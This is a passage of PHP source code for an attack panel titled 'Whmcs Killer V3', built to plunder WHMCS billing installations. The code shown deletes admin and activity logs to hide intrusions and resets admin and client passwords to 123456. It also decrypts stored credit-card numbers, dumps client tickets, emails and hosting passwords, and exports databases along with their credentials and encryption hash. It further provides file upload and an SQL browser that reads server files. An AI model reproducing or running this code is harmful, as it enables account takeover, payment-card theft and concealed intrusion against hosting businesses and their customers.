  1223. echo "<hr><center><h1>Delete Adminlog</h1><br><form method=\"POST\" action=\"?p=8\" ><input type=\"text\" name=\"ip\" value=\"".$_SERVER["REMOTE_ADDR"]."\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"ip\"></form>";
  1224. break;
  1225. case"3":
  1226. echo "<hr><center><h1>Change Admin Password to 123456</h1><br><form method=\"POST\" action=\"?p=8\" ><h3 class=\"tit\">Admin ID:</h3><input type=\"text\" name=\"idd\" value=\"1\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"cpa\"></form>";
  1227. break;
  1228. case"4":
  1229. echo "<hr><center><h1>Change Client Password to 123456</h1><br><form method=\"POST\" action=\"?p=8\" ><h3 class=\"tit\">Mail:</h3><input type=\"text\" name=\"mail\" value=\"client@mail.com\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"cpc\"></form>";
  1230. break;
  1231. case"5":
  1232. echo "<hr><center><h1>Change Client Mail</h1><br><form method=\"POST\" action=\"?p=8\" ><h3 class=\"tit\">Client ID:</h3><input type=\"text\" name=\"id\" value=\"\"><h3 class=\"tit\">Client Mail:</h3><input type=\"text\" name=\"mail\" value=\"\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"ccm\"></form>";
  1233. break;
  1234. case"6":
  1235. echo ("<hr>\n<h1> Decrypt Password</h1>\n<FORM action=\"?p=8\" method=\"post\">\n<input type=\"hidden\" name=\"f\" value=\"dec\">\n<br>\n<table border=1>\n\n<tr><td>Password</td><td><input type=\"text\" size=\"30\" name=\"password\" value=\"\"></td></tr>\n<tr><td>cc_encryption_hash</td><td><input type=\"text\" size=\"30\" name=\"cc_encryption_hash\" value=\"\"></td></tr>\n\n</table>\n<br>\n<INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\">\n</FORM>\n<hr>");
  1236. break;
  1237. }
  1238. if($_POST["f"]=="dec")
  1239. {
  1240. $password=($_POST["password"]);
  1241. $cc_encryption_hash=($_POST["cc_encryption_hash"]);
  1242. $password=decrypt($password,$cc_encryption_hash);
  1243. echo("<h1>Password is ".$password."</h1>");
  1244. }
  1245. if($_POST["f"]=="upload")
  1246. {
  1247. $filedir="";
  1248. $maxfile="2000000000";
  1249. $userfile_name=$_FILES["image"]["name"];
  1250. $userfile_tmp=$_FILES["image"]["tmp_name"];
  1251. if(isset($_FILES["image"]["name"]))
  1252. {
  1253. $abod=$filedir.$userfile_name;
  1254. @move_uploaded_file($userfile_tmp,$abod);
  1255. echo"<p class=\"msg done\">Done ==> $userfile_name</p>";
  1256. }
  1257. }
  1258. if($_POST["f"]=="ip")
  1259. {
  1260. $tryChaning=mysql_query("DELETE FROM tbladminlog where ipaddress='".$_POST["ip"]."'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1261. $tryChaning=mysql_query("DELETE FROM tblactivitylog where ipaddr='".$_POST["ip"]."'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1262. if($tryChaning)
  1263. {
  1264.  
  1265. echo("<p class=\"msg done\"><br>Last adminlog successfully deleted</p>");
  1266. }
  1267. else
  1268. {
  1269.  
  1270. echo("<p class=\"msg info\"><br>Deleteing adminlog error</p>");
  1271. }
  1272. }
  1273. if($_POST["f"]=="cpa")
  1274. {
  1275. $tryChaningInfo=mysql_query("UPDATE tbladmins SET password = 'e10adc3949ba59abbe56e057f20f883e' where id='".$_POST["idd"]."'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1276. if($tryChaningInfo)
  1277. {
  1278.  
  1279. echo("<p class=\"msg done\"><br>[+] Changing admin password to 123456</p>");
  1280. }
  1281. else
  1282. {
  1283.  
  1284. echo("<p class=\"msg info\"><br>[-] Changing admin password error</p>");
  1285. exit;
  1286. }
  1287. }
  1288. if($_POST["f"]=="cpc")
  1289. {
  1290. $tryChaningInfo=mysql_query("UPDATE tblclients SET password = '760d0530440ec45a2c3dc8b38dee8e9a:%ME)v' where email='".$_POST["mail"]."'");
  1291. if($tryChaningInfo)
  1292. {
  1293.  
  1294. echo("<p class=\"msg done\"><br>[+] Changing client ".$_POST["mail"]." password to 123456</p>");
  1295. }
  1296. else
  1297. {
  1298.  
  1299. echo("<p class=\"msg info\"><br>[-] Changing client password error</p>");
  1300. exit;
  1301. }
  1302. }
  1303. if($_POST["f"]=="ccm")
  1304. {
  1305. $tryChaningInfo=mysql_query("UPDATE tblclients SET email = '".$_POST["mail"]."' where id='".$_POST["id"]."'");
  1306. if($tryChaningInfo)
  1307. {
  1308.  
  1309. echo("<p class=\"msg done\"><br>[+] Changing client ".$_POST["id"]." mail to ".$_POST["mail"]."</p>");
  1310. }
  1311. else
  1312. {
  1313.  
  1314. echo("<p class=\"msg info\"><br>[-] Changing client password error</p>");
  1315. exit;
  1316. }
  1317. }
  1318. break;
  1319. ###################################################
  1320. case 9:
  1321. foreach($_COOKIE as$name=>$value)
  1322. {
  1323. setcookie($name,"");
  1324. }
  1325.  
  1326. echo("<meta http-equiv='refresh' content='1;URL=?' />");
  1327. break;
  1328. ###################################################
  1329. default:
  1330. if($_COOKIE["login"]=="1")
  1331. {
  1332. echo("<meta http-equiv='refresh' content='1;URL=?p=1' />");
  1333. //echo("<title>Whmcs Killer Coded by RAB3OUN</title><FRAMESET cols=\"200,*\"> \n<FRAME name=\"sommaire\" target=\"frame1\" src=\"?p=m\" scrolling=\"auto\">\n<FRAME name=\"frame1\" src=\"?p=102\" scrolling=\"auto\"> \n</FRAMESET>\n<NOFRAMES> <P>Cette page utilise des cadres, mais votre navigateur ne les prend pas en charge.</p> </NOFRAMES>");
  1334. }
  1335. else
  1336. {
  1337.  
  1338. // //header1();
  1339. @ob_end_clean();
  1340. login();
  1341. }
  1342. break;
  1343. ###################################################
  1344. case 11:
  1345. echo "<center><h1>Backup</h1></center><br>";
  1346. $link=mysql_connect($db_host,$db_username,$db_password);
  1347. mysql_select_db($db_name,$link);
  1348. $do=$_POST["action"];
  1349. if($do=="yes")
  1350. {
  1351. error_reporting(E_ALL^E_NOTICE);
  1352. @ini_set("memory_limit",32*1024*1024);
  1353. @ini_set("max_execution_time","480");
  1354. $tables=$_POST["tablen"];
  1355. foreach($tables as$table)
  1356. {
  1357. $query=@mysql_query("SHOW CREATE TABLE ".$table);
  1358. $que=@mysql_fetch_array($query);
  1359. $outta.=$que["Create Table"].";
  1360. \n";
  1361. $outta.="\n";
  1362. $query=mysql_query("select * from ".$table);
  1363. $num_fields=mysql_num_fields($query);
  1364. $numrow=mysql_num_rows($query);
  1365. while($row=mysql_fetch_array($query))
  1366. {
  1367. $outta.="INSERT INTO ".$table." VALUES(";
  1368. for($j=0;
  1369. $j<$num_fields;
  1370. $j++)
  1371. {
  1372. $row[$j]=addslashes($row[$j]);
  1373. $row[$j]=str_replace("\n","\n",$row[$j]);
  1374. $row[$j]=str_replace("\r","",$row[$j]);
  1375. if(isset($row[$j]))$outta.="'$row[$j]'";
  1376. else$outta.="";
  1377. if($j<($num_fields-1))$outta.=", ";
  1378. }
  1379. $outta.=");
  1380. \n";
  1381. }
  1382. $outta.="\n";
  1383. }
  1384. $date=time();
  1385. @ob_end_clean();
  1386. header("Content-length: ".strlen("-- --------WHMCS BACKUP ----------------\n\t-- host:".$db_host."\n\t-- username:".$db_username."\n\t-- password:".$db_password."\n\t-- cc_hash:".$_COOKIE["cc_encryption_hash"]."\n-- ------------------------------\n".$outta));
  1387. header("Content-type: text/plain");
  1388. header("Content-Disposition: attachment; filename=".$_SERVER["HTTP_HOST"]."-$date.sql");
  1389. echo"-- --------WHMCS BACKUP ----------------\n\t-- host:".$db_host."\n\t-- username:".$db_username."\n\t-- password:".$db_password."\n\t-- cc_hash:".$_COOKIE["cc_encryption_hash"]."\n-- ------------------------------\n".$outta;
  1390. }
  1391.  
  1392. echo "<script language=\"JavaScript\">
  1393. function checkAll(form)
  1394. {
  1395. for (var i = 1; i < form.elements.length; i++)
  1396. {
  1397. eval(\"form.elements[\" + i + \"].checked = form.elements[1].checked\");
  1398. }
  1399. }
  1400. </script>";
  1401. $tables=@mysql_query("SHOW TABLE STATUS");
  1402. echo "<center><form name=\"formw\" method=\"post\">\n\n<input name=\"action\" type=\"hidden\" value=\"yes\">\n\n<table width=\"280\" border=\"1\" align=\"center\" cellpadding=\"4\" cellspacing=\"0\" >\n\n <tr>\n\n <th align=\"center\" height=\"28\" width=\"35\"><input name=\"tablenall\" type=\"checkbox\" checked=\"checked\" onClick=\"checkAll(this.form)\"/></th>\n\n <th align=\"center\" width=\"130\">Tabel Name</th>\n\n <th width=\"100\"><div align=\"center\">Size</div></th>\n\n </tr>";
  1403. while($table=@mysql_fetch_array($tables))
  1404. {
  1405. $size=round($table["Data_length"]/1024,2);
  1406. echo" <tr><td>";
  1407. echo"<input type=\"checkbox\" name=\"tablen[]\" value=\"$table[Name]\" checked=\"checked\" />";
  1408. echo"</td>\n\n <td><b>";
  1409. echo$table[Name];
  1410. echo"</b></td>\n\n <td><div align=\"center\"> kb <b>";
  1411. echo$size;
  1412. echo"</b></div></td>\n\n </tr>";
  1413. }
  1414.  
  1415. echo"\n</table> <br>\n\n<center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[download backup ]\" /></center>\n\n</form>";
  1416. break;
  1417. ###################################################
  1418. case 12:
  1419.  
  1420. if($_GET["m"])
  1421. {
  1422. $query1=mysql_query("SELECT * FROM tblemails where id='".$_GET["m"]."'");
  1423. $v=mysql_fetch_array($query1,true);
  1424. echo($v["subject"]);
  1425. echo("<br>");
  1426. echo($v["message"]);
  1427. exit;
  1428. }
  1429. echo "<center><h1>Client id ".$_GET["id"]."</h1><br>";
  1430. echo("<h3 class=\"tit\">Info</h3></center>");
  1431. echo "<ul>
  1432. <li><a href='#t'>Client Tickets</a><li>
  1433. <li><a href='#h'>Client Hosts</a><li>
  1434. <li><a href='#m'>Client mails</a><li>
  1435. </ul>";
  1436. $query1=mysql_query("SELECT * FROM tblclients where id='".$_GET["id"]."'");
  1437. $v=mysql_fetch_array($query1,true);
  1438. if ($v)
  1439. {
  1440. echo "<center><table>";
  1441. $i=0;
  1442. foreach ($v as $x=>$y)
  1443. {
  1444. if ($i%2==0) {$bg='class="bg"';} else {$bg=';}
  1445. if (($x=='cardnum') or ($x=='startdate') or ($x=='expdate') or ($x=='issuenumber'))
  1446. {
  1447. echo "<tr $bg><td>$x</td><td>".decrypt($y,$cc_encryption_hash)."</td></tr>";
  1448. }
  1449. else
  1450. {
  1451. echo "<tr $bg><td>$x</td><td>$y</td></tr>";
  1452. }
  1453. $i++;
  1454. }
  1455. echo("</table><br>");
  1456. }
  1457. echo "<h1 id='t'>Client Tickets</h1></center><br><ul>";
  1458. $query=mysql_query("SELECT * FROM tbltickets where userid='".$_GET["id"]."'");
  1459. while($v=mysql_fetch_array($query))
  1460. {
  1461. echo "<li><a href='#t".$v['id']."'>".$v['id']." ".$v["title"]."</a></li><br>";
  1462. }
  1463. echo "</ul>";
  1464. $query=mysql_query("SELECT * FROM tbltickets where userid='".$_GET["id"]."'");
  1465. while($v=mysql_fetch_array($query))
  1466. {
  1467. echo("<br><br><center><h3 id='t".$v["id"]."' class=\"tit\">Ticket ID ".$v["id"]."</h3></center><br><br>");
  1468. echo("<center><table border=1>");
  1469. echo("<tr><th>".$v["title"]."<br>".$v["date"]."</th></tr>");
  1470. echo("<tr><td>".($v["message"])."</td></tr>");
  1471. $query2=mysql_query("select * from tblticketreplies where tid='".$v["id"]."'");
  1472. while($v2=mysql_fetch_array($query2))
  1473. {
  1474. if($v2["admin"])
  1475. {
  1476. echo("<tr class='bg' ><td>".nl2br($v2["message"])."</td></tr>");
  1477. }
  1478. else
  1479. {
  1480. echo("<tr $bg ><td>".nl2br($v2["message"])."</td></tr>");
  1481. }
  1482. }
  1483.  
  1484. echo("</table><br><br>");
  1485.  
  1486. }
  1487. echo("<h1 id='h'>Client Hosts</h1><br><br>");
  1488. table("SELECT * FROM tblhosting where userid='".$_GET["id"]."'",array('domain','domainstatus','username','password','notes','dedicatedip','assignedips'));
  1489.  
  1490. echo("<h1 id='m'>Client mails</h1><br><br>");
  1491. $query=mysql_query("SELECT * FROM tblemails where userid='".$_GET["id"]."'");
  1492. if (mysql_fetch_array($query)) {
  1493. echo("<table><tr><th>Subject</th><th>Date</th></tr>");
  1494. $i=0;
  1495. while($v=mysql_fetch_array($query))
  1496. {
  1497. if ($i%2==0) {$bg='class="bg"';} else {$bg=';}
  1498. echo("<tr $bg><td><a href='?p=12&id=".$_GET["id"]."&m=".$v["id"]."'>".$v["subject"]."</a></td><td>".$v["date"]."</td></tr>");
  1499. $i++;
  1500. }
  1501.  
  1502. echo("</table>");
  1503. }
  1504. else
  1505. {
  1506. echo '<p class="msg error">Nothing Found !</p>';
  1507. }
  1508. break;
  1509. ##############################################
  1510. }
  1511.  
  1512. echo ' </div>
  1513. </div> <!-- /cols -->
  1514. <hr class="noscreen" />
  1515. <!-- Footer -->
  1516. <div id="footer" class="box">
  1517. <p class="f-left">Coded by <a href="http://www.rab3oun.net">RAB3OUN</a>, </p>
  1518. <p class="f-right">Templates by Adminizio</p>
  1519. </div> <!-- /footer -->
  1520. </div> <!-- /main -->
  1521. </body>
  1522. </html>';
  1523.  
  1524. ################################
  1525.  
  1526. function actionSql() {
  1527. $_POST['p2']=stripslashes($_POST['p2']);
  1528. echo "<script>
  1529. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  1530. var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
  1531. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  1532. var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
  1533. var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
  1534. var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
  1535. var d = document;
  1536. function set(a,c,p1,p2,p3,charset) {
  1537. if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  1538. if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  1539. if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  1540. if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  1541. if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  1542. if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  1543. }
  1544. function g(a,c,p1,p2,p3,charset) {
  1545. set(a,c,p1,p2,p3,charset);
  1546. d.mf.submit();
  1547. }
  1548. function a(a,c,p1,p2,p3,charset) {
  1549. set(a,c,p1,p2,p3,charset);
  1550. var params = 'ajax=true';
  1551. for(i=0;i<d.mf.elements.length;i++)
  1552. params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  1553. sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
  1554. }
  1555. function sr(url, params) {
  1556. if (window.XMLHttpRequest)
  1557. req = new XMLHttpRequest();
  1558. else if (window.ActiveXObject)
  1559. req = new ActiveXObject('Microsoft.XMLHTTP');
  1560. if (req) {
  1561. req.onreadystatechange = processReqChange;
  1562. req.open('POST', url, true);
  1563. req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  1564. req.send(params);
  1565. }
  1566. }
  1567. function processReqChange() {
  1568. if( (req.readyState == 4) )
  1569. if(req.status == 200) {
  1570. var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
  1571. var arr=reg.exec(req.responseText);
  1572. eval(arr[2].substr(0, arr[1]));
  1573. } else alert('Request error!');
  1574. }
  1575. </script>
  1576. <html>\n<title>Whmcs Killer V3 (Coded by RAB3OUN)</title>\n<head>\n
  1577. <style>
  1578. \n\nbody\n
  1579. {
  1580. \n\tbackground: #0f0e0d;
  1581. \n\tcolor: #FF9933;
  1582. \n\n\tpadding: 0px;
  1583. \n\n}
  1584. \n
  1585. a:link, body_alink
  1586. \n
  1587. {
  1588. \n\t
  1589. color: #FF9933;
  1590. \n\t
  1591. text-decoration: none;
  1592. \n}
  1593. \n
  1594. a:visited, body_avisited\n
  1595. {
  1596. \n\tcolor: #FF9933;
  1597. \n\ttext-decoration: none;
  1598. \n}
  1599. \n
  1600. a:hover, a:active, body_ahover\n
  1601. {
  1602. \n\t
  1603. color: #FFFFFF;
  1604. \n\t
  1605. text-decoration: none;
  1606. \n
  1607. }
  1608. th:hover\n
  1609. {
  1610. \n\t
  1611. background: #524f46;
  1612. \n\t
  1613. text-decoration: none;
  1614. \n
  1615. }
  1616. \ntd, th, p, li,table\n
  1617. {
  1618. \n\t\n\tbackground: #2e2b28;
  1619. \n\tborder:1px solid #524f46;
  1620. \n}
  1621. \n\ninput\n
  1622. {
  1623. \n\tborder: 1px solid;
  1624. \n\n\tcursor: default;
  1625. \n\t\n\toverflow: hidden;
  1626. \n\tbackground: #2e2b28;
  1627. \n\tcolor: #ffffff;
  1628. \n}
  1629. \n</style>\n
  1630. <head><body><div style='position:absolute;width:100%;top:0;left:0;'>
  1631. <form method=post name=mf style='display:none;'>
  1632. <input type=hidden name=a>
  1633. <input type=hidden name=c>
  1634. <input type=hidden name=p1>
  1635. <input type=hidden name=p2>
  1636. <input type=hidden name=p3>
  1637. <input type=hidden name=charset>
  1638. </form>";
  1639. class DbClass {
  1640. var $type;
  1641. var $link;
  1642. var $res;
  1643. function DbClass($type) {
  1644. $this->type = $type;
  1645. }
  1646. function connect($host, $user, $pass, $dbname){
  1647. switch($this->type) {
  1648. case 'mysql':
  1649. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
  1650. break;
  1651. case 'pgsql':
  1652. $host = explode(':', $host);
  1653. if(!$host[1]) $host[1]=5432;
  1654. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  1655. break;
  1656. }
  1657. return false;
  1658. }
  1659. function selectdb($db) {
  1660. switch($this->type) {
  1661. case 'mysql':
  1662. if (@mysql_select_db($db))return true;
  1663. break;
  1664. }
  1665. return false;
  1666. }
  1667. function query($str) {
  1668. switch($this->type) {
  1669. case 'mysql':
  1670. return $this->res = @mysql_query($str);
  1671. break;
  1672. case 'pgsql':
  1673. return $this->res = @pg_query($this->link,$str);
  1674. break;
  1675. }
  1676. return false;
  1677. }
  1678. function fetch() {
  1679. $res = func_num_args()?func_get_arg(0):$this->res;
  1680. switch($this->type) {
  1681. case 'mysql':
  1682. return @mysql_fetch_assoc($res);
  1683. break;
  1684. case 'pgsql':
  1685. return @pg_fetch_assoc($res);
  1686. break;
  1687. }
  1688. return false;
  1689. }
  1690. function listDbs() {
  1691. switch($this->type) {
  1692. case 'mysql':
  1693. return $this->query("SHOW databases");
  1694. break;
  1695. case 'pgsql':
  1696. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
  1697. break;
  1698. }
  1699. return false;
  1700. }
  1701. function listTables() {
  1702. switch($this->type) {
  1703. case 'mysql':
  1704. return $this->res = $this->query('SHOW TABLES');
  1705. break;
  1706. case 'pgsql':
  1707. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
  1708. break;
  1709. }
  1710. return false;
  1711. }
  1712. function error() {
  1713. switch($this->type) {
  1714. case 'mysql':
  1715. return @mysql_error();
  1716. break;
  1717. case 'pgsql':
  1718. return @pg_last_error();
  1719. break;
  1720. }
  1721. return false;
  1722. }
  1723. function setCharset($str) {
  1724. switch($this->type) {
  1725. case 'mysql':
  1726. if(function_exists('mysql_set_charset'))
  1727. return @mysql_set_charset($str, $this->link);
  1728. else
  1729. $this->query('SET CHARSET '.$str);
  1730. break;
  1731. case 'pgsql':
  1732. return @pg_set_client_encoding($this->link, $str);
  1733. break;
  1734. }
  1735. return false;
  1736. }
  1737. function loadFile($str) {
  1738. switch($this->type) {
  1739. case 'mysql':
  1740. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
  1741. break;
  1742. case 'pgsql':
  1743. $this->query("CREATE TABLE BOFF2(file text);COPY BOFF2 FROM '".addslashes($str)."';select file from BOFF2;");
  1744. $r=array();
  1745. while($i=$this->fetch())
  1746. $r[] = $i['file'];
  1747. $this->query('drop table BOFF2');
  1748. return array('file'=>implode("\n",$r));
  1749. break;
  1750. }
  1751. return false;
  1752. }
  1753. function dump($table, $fp = false) {
  1754. switch($this->type) {
  1755. case 'mysql':
  1756. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  1757. $create = mysql_fetch_array($res);
  1758. $sql = $create[1].";\n";
  1759. if($fp) fwrite($fp, $sql); else echo($sql);
  1760. $this->query('SELECT * FROM `'.$table.'`');
  1761. $head = true;
  1762. while($item = $this->fetch()) {
  1763. $columns = array();
  1764. foreach($item as $k=>$v) {
  1765. if($v == null)
  1766. $item[$k] = "NULL";
  1767. elseif(is_numeric($v))
  1768. $item[$k] = $v;
  1769. else
  1770. $item[$k] = "'".@mysql_real_escape_string($v)."'";
  1771. $columns[] = "`".$k."`";
  1772. }
  1773. if($head) {
  1774. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
  1775. $head = false;
  1776. } else
  1777. $sql = "\n\t,(".implode(", ", $item).')';
  1778. if($fp) fwrite($fp, $sql); else echo($sql);
  1779. }
  1780. if(!$head)
  1781. if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
  1782. break;
  1783. case 'pgsql':
  1784. $this->query('SELECT * FROM '.$table);
  1785. while($item = $this->fetch()) {
  1786. $columns = array();
  1787. foreach($item as $k=>$v) {
  1788. $item[$k] = "'".addslashes($v)."'";
  1789. $columns[] = $k;
  1790. }
  1791. $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  1792. if($fp) fwrite($fp, $sql); else echo($sql);
  1793. }
  1794. break;
  1795. }
  1796. return false;
  1797. }
  1798. };
  1799. $db = new DbClass($_POST['type']);
  1800. if(@$_POST['p2']=='download') {
  1801. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  1802. $db->selectdb($_POST['sql_base']);
  1803. switch($_POST['charset']) {
  1804. case "Windows-1251": $db->setCharset('cp1251'); break;
  1805. case "UTF-8": $db->setCharset('utf8'); break;
  1806. case "KOI8-R": $db->setCharset('koi8r'); break;
  1807. case "KOI8-U": $db->setCharset('koi8u'); break;
  1808. case "cp866": $db->setCharset('cp866'); break;
  1809. }
  1810. if(empty($_POST['file'])) {
  1811. ob_start("ob_gzhandler", 4096);
  1812. header("Content-Disposition: attachment; filename=dump.sql");
  1813. header("Content-Type: text/plain");
  1814. foreach($_POST['tbl'] as $v)
  1815. $db->dump($v);
  1816. exit;
  1817. } elseif($fp = @fopen($_POST['file'], 'w')) {
  1818. foreach($_POST['tbl'] as $v)
  1819. $db->dump($v, $fp);
  1820. fclose($fp);
  1821. unset($_POST['p2']);
  1822. } else
  1823. die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
  1824. }
  1825.  
  1826. echo "
  1827. <center><h1>Sql browser</h1></center><div class=content>
  1828. <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr valign='top'>
  1829. <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr valign='top'>
  1830. <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value='><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:') ."'>
  1831. <td><select name='type'><option value='mysql' ";
  1832. if(@$_POST['type']=='mysql')echo 'selected';
  1833. echo ">MySql</option><option value='pgsql' ";
  1834. if(@$_POST['type']=='pgsql')echo 'selected';
  1835. echo ">PostgreSql</option></select></td>
  1836. <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?$_COOKIE["db_host"]:htmlspecialchars($_POST['sql_host'])) ."'></td>
  1837. <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?$_COOKIE["db_username"]:htmlspecialchars($_POST['sql_login'])) ."'></td>
  1838. <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?$_COOKIE["db_password"]:htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
  1839. $tmp = "<input type=text name=sql_base value='".$_COOKIE["db_name"]."'>";
  1840. if(isset($_POST['sql_host'])){
  1841. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  1842. switch($_POST['charset']) {
  1843. case "Windows-1251": $db->setCharset('cp1251'); break;
  1844. case "UTF-8": $db->setCharset('utf8'); break;
  1845. case "KOI8-R": $db->setCharset('koi8r'); break;
  1846. case "KOI8-U": $db->setCharset('koi8u'); break;
  1847. case "cp866": $db->setCharset('cp866'); break;
  1848. }
  1849. $db->listDbs();
  1850. echo "<select name=sql_base><option value='></option>";
  1851. while($item = $db->fetch()) {
  1852. list($key, $value) = each($item);
  1853. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':').'>'.$value.'</option>';
  1854. }
  1855. echo '</select>';
  1856. }
  1857. else echo $tmp;
  1858. }else
  1859. echo $tmp;
  1860. echo "</td>
  1861. <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
  1862. <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?':' checked') . "> count the number of rows</td>
  1863. </tr>
  1864. </table>
  1865. <script>
  1866. s_db='".@addslashes($_POST['sql_base'])."';
  1867. function fs(f) {
  1868. if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
  1869. if(f.p1) f.p1.value=';
  1870. if(f.p2) f.p2.value=';
  1871. if(f.p3) f.p3.value=';
  1872. }
  1873. }
  1874. function st(t,l) {
  1875. d.sf.p1.value = 'select';
  1876. d.sf.p2.value = t;
  1877. if(l && d.sf.p3) d.sf.p3.value = l;
  1878. d.sf.submit();
  1879. }
  1880. function is() {
  1881. for(i=0;i<d.sf.elements['tbl[]'].length;++i)
  1882. d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
  1883. }
  1884. </script>";
  1885. if(isset($db) && $db->link){
  1886. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  1887. if(!empty($_POST['sql_base'])){
  1888. $db->selectdb($_POST['sql_base']);
  1889. echo "<tr valign='top'><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
  1890. $tbls_res = $db->listTables();
  1891. while($item = $db->fetch($tbls_res)) {
  1892. list($key, $value) = each($item);
  1893. if(!empty($_POST['sql_count']))
  1894. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'));
  1895. $value = htmlspecialchars($value);
  1896. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
  1897. }
  1898. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
  1899. if(@$_POST['p1'] == 'select') {
  1900. $_POST['p1'] = 'query';
  1901. $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
  1902. $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
  1903. $num = $db->fetch();
  1904. $pages = ceil($num['n'] / 30);
  1905. echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
  1906. echo " of $pages";
  1907. if($_POST['p3'] > 1)
  1908. echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
  1909. if($_POST['p3'] < $pages)
  1910. echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
  1911. $_POST['p3']--;
  1912. if($_POST['type']=='pgsql')
  1913. $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
  1914. else
  1915. $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
  1916. echo "<br><br>";
  1917. }
  1918. if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
  1919. $db->query(@$_POST['p2']);
  1920. if($db->res !== false) {
  1921. $title = false;
  1922. echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
  1923. $line = 1;
  1924. while($item = $db->fetch()) {
  1925. if(!$title) {
  1926. echo '<tr valign="top">';
  1927. foreach($item as $key => $value)
  1928. echo '<td>'.$key.'</td>';
  1929. reset($item);
  1930. $title=true;
  1931. echo '</tr><tr valign="top">';
  1932. $line = 2;
  1933. }
  1934. echo '<tr valign="top"class="l'.$line.'">';
  1935. $line = $line==1?2:1;
  1936. foreach($item as $key => $value) {
  1937. if($value == null)
  1938. echo '<td><i>null</i></td>';
  1939. else
  1940. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  1941. }
  1942. echo '</tr>';
  1943. }
  1944. echo '</table>';
